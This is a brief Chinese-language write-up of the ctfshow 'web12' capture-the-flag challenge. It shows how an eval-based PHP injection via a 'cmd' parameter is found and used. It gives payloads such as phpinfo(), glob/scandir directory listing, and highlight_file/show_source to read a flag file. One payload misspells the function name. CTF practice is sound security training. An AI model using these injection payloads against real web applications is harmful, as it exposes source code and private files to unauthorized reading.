ctfshow web12
提示cmd cmd不就是command的缩写吗 传入命令看一下
传入?cmd=phpinfo();一定要有分号
有回显页面的 推测后台函数可能为代码执行eval($_GET['cmd']);或者是命令执行system($_GET['cmd']);
?cmd='ls';没有回显
?cmd=print_r(glob("*.*"));或者是?cmd=print_r(scandir("."));可以匹配当前目录的所有文件
由此可以推出后台函数为eval()
执行查看目录文件后得到如下页面
highlight_file()或者show_source()函数可以查看目标文件
这俩是一样的函数 只是名称不一样?cmd=hight_file('index.php');可以确认一下后台源码
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
?cmd=show_source('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
